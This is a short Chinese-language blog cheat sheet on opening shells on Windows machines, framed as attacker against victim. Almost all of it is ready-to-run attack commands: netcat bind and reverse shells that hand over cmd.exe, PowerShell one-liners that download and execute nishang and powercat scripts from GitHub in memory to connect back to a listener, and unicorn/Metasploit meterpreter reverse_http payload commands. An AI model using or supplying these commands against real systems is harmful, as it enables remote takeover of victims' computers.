Windows 反弹 Shell

NC 反弹 shell

攻击场景:

  Victim IP:  192.168.2.10
  Attacker IP:192.168.2.11

正向 Shell

我们想要弹回Victim的Shell,使用如下命令:

Victim:nc -lvp 9999 -e cmd.exe

Attacker:nc 192.168.2.10 9999 

ps:先在肉鸡上开一个cmd服务,然后在攻击机上进行连接

反向 Shell

Attacker:nc -vlp 9999

Victim:nc 192.168.2.11 9999 -e cmd.exe

ps:先在攻击机上进行监听,然后在肉鸡上给Attacker开一个cmd

PowerShell 反弹 shell

监听主机:nc -vlp 9999

目标执行:内存加载远程脚本,相当于远程代码执行

Invoke-Shellcode.ps1

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp  -Reverse -IPAddress 监听主机ip -Port 9999"

powcat.ps1

powershell -nop -exec bypass -c "IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c 监听主机ip  -p 9999 -e cmd.exe"

unicorn

python unicorn.py windows/meterpreter/reverse_http 17.10.0.1 4455
msfconsole -r unicorn.rc

 

上一篇:windows开了防火墙 symanetc be备份老失败?symantecbe使用哪些端口?


下一篇:sqli-labs 通关指南:Less 27、28